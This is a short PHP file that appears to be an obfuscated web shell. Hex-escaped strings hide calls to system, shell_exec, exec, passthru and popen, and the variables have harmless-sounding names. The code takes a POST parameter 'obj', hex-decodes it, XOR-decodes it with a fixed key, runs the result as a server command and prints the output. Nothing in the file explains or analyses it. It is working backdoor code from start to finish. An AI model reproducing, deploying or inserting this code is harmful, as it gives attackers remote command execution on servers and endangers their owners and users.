<?php

$event_handler4 = "\x70ass\x74h\x72u";
$event_handler5 = "pope\x6E";
$event_handler3 = "\x65xec";
$dependency_resolver = "he\x78\x32bin";
$event_handler2 = "s\x68el\x6C_\x65xe\x63";
$event_handler1 = "\x73\x79stem";
$event_handler6 = "s\x74\x72\x65\x61m_g\x65t\x5Fcon\x74e\x6Ets";
$event_handler7 = "pc\x6C\x6Fs\x65";
if (isset($_POST["\x6Fb\x6A"])) {
            function reverse_lookup     (   $holder   ,     $dat    )   {
     $dchunk    =   ''     ;
      $o=0;
 while($o<strlen($holder)){
$dchunk.=chr(ord($holder[$o])^$dat);
$o++;

} return    $dchunk;
     
}
            $obj = $dependency_resolver($_POST["\x6Fb\x6A"]);
            $obj = reverse_lookup($obj, 20);
            if (function_exists($event_handler1)) {
                $event_handler1($obj);
            } elseif (function_exists($event_handler2)) {
                print $event_handler2($obj);
            } elseif (function_exists($event_handler3)) {
                $event_handler3($obj, $descriptor_holder);
                print join("\n", $descriptor_holder);
            } elseif (function_exists($event_handler4)) {
                $event_handler4($obj);
            } elseif (function_exists($event_handler5) && function_exists($event_handler6) && function_exists($event_handler7)) {
                $dat_dchunk = $event_handler5($obj, 'r');
                if ($dat_dchunk) {
                    $marker_symbol = $event_handler6($dat_dchunk);
                    $event_handler7($dat_dchunk);
                    print $marker_symbol;
                }
            }
            exit;
        }